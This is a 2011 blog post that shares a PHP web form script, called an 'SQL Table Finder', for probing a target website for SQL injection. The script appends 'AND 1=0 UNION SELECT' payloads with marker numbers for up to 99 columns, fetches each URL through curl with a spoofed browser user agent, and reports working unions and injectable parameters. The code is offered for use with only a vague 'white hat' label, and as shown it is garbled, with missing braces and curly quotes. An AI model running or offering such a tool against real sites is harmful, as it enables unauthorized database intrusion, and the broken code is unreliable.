script finder table

6 February 2011 at 8:58 pm Leave a comment

Here is the script to find table for security web..
This is will usefull for IT security cause it is related with white hat..

Here is the script php

<title>..::[�] SQL Table Finder [�]::..</title>
<meta http-equiv="expires" content="0">
font-family:courier new;

<form action="" method="post">
<b>Specify the website:</b>
<input size="40" type="text" name="site" value="; style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
<input size="1" type="text" name="separator" value="+" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
<input size="1" type="text" name="comment" value="–" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
<input type="hidden" name="go" value="GO!" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
<input type="submit" text="GO!" style="color: #0066cc; border: 1px solid #0066cc;background-color: #000000">
if (isset($_POST[‘go’])) {
set_time_limit(0); //disable timeout
$working_union = false;
for ($i = 1; $i < 100; $i++) {
$url = $_POST[‘site’] . $_POST[‘separator’] . ‘AND’ . $_POST[‘separator’] . ‘1=0’ . $_POST[‘separator’] . ‘UNION’ . $_POST[‘separator’] . ‘SELECT’ . $_POST[‘separator’];
for ($j = 1; $j <= $i; $j++) {
$url .= sprintf(‘6191337%02d’, $j);
if ($j < $i) {
$url .= ‘,’;
$url .= $_POST[‘comment’];
//echo ‘TESTING URL: ‘, $url, ‘<br>’;
$page = view_page($url);
$page = strip_tags($page);
if (!(strpos($page, ‘6191337’) === false)) {
$working_union = true;
echo ‘<font color="red">FOUND WORKING UNION!</font><br>’;
$url = str_replace(‘61913370’, ”, $url);
$url = str_replace(‘6191337’, ”, $url);
echo ‘<font color="green">’, $url, ‘</font><br>’;
while (true) {
$page = substr(strstr($page, ‘6191337’), 7);
if ($page == false) {
echo ‘Injectable parameter: ‘, (int) substr($page, 0, 2), ‘<br>’;
if ($working_union == false) {
print ‘<font color="red">NO WORKING UNION FOUND!</font><br>’;

function view_page($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
$result = curl_exec($curl);
return $result;

save this script with extension .php
Happy Coding


Entry filed under: Blog and Website. Tags: , .

The example of result of the bad script HTML Script for free message

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed

Blog Stats

  • 57,930 hits
free counters

AziesT on Facebook

Yahoo bot last visit Msn bot last visit SEO Stats

Our Teams


%d bloggers like this: